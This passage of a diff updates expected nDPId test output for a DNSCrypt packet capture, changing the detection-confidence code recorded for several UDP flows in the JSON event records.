AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400522,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739400522,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":564,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739400522} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":564,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739400522,"pkt":"REREREREZmZmZmZmCABFAABQaQ0AuX4Rb+8KAAABTUJU6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":946739400522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":946739400522,"pkt":"ZmZmZmZmRERERERECABFAADQoa1AADYRp\/25wX\/0CgAAAQG7tOoAvNxR\/I6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAANT+QyCeqOpvY3ek9vOTVGrWy3oc27D9SS491oCJRe7RQWKb3q0aPb33Ziq0RP9PPCzRMBy1lW3l6rz74jWgmwszJtIbCS+4i64Fme9c0vB4hxz+sKp41i8d9KRbhVFMbjMm0hsJL7iLAAAAAV9TV8BfVKlA"} 
@@ -1147,26 +1147,26 @@ 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":946739400553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":946739400553,"pkt":"ZmZmZmZmRERERERECABFAADcDmwAADYREr5NQlTpCgAAAQG73xUAyIPxsp2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjIIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAAHTELXM+13EPB+IE+zJ9PQOXdJ7IKBJfAx72Wd7gihP8hRGtsF77cDm0yhz652JqAFc0tI+h6KATFWPKnD7HPQCiR1MNmirJFbpEf5fuBV5xkfCiHCm163IIgp4yvCcsa6NHUw2aKskVX1OfeV9Tn3lfVPD5"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402187,"flow_last_seen":946739402187,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":946739402187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739402187,"pkt":"REREREREZmZmZmZmCABFAAIc1vJAAH4RAOYKAAABF29KzejDAbsCCCUSS8MBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402187,"flow_last_seen":946739402187,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402187,"flow_last_seen":946739402187,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":59587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAIc1vNAAH4RAOUKAAABF29Kze20AbsCCCUSS8UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAIc1vRAAH4RAOQKAAABF29Kza75AbsCCCUSS8cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":44793,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAXc1vYgAH4RHSIKAAABF29Kzc81AbsGBMTJS8YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":53045,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402188,"flow_last_seen":946739402188,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739402188,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":946739402188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739402188,"pkt":"REREREREZmZmZmZmCABFAAXc1vUgAH4RHSMKAAABF29KzYToAbsGBA8bS8IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
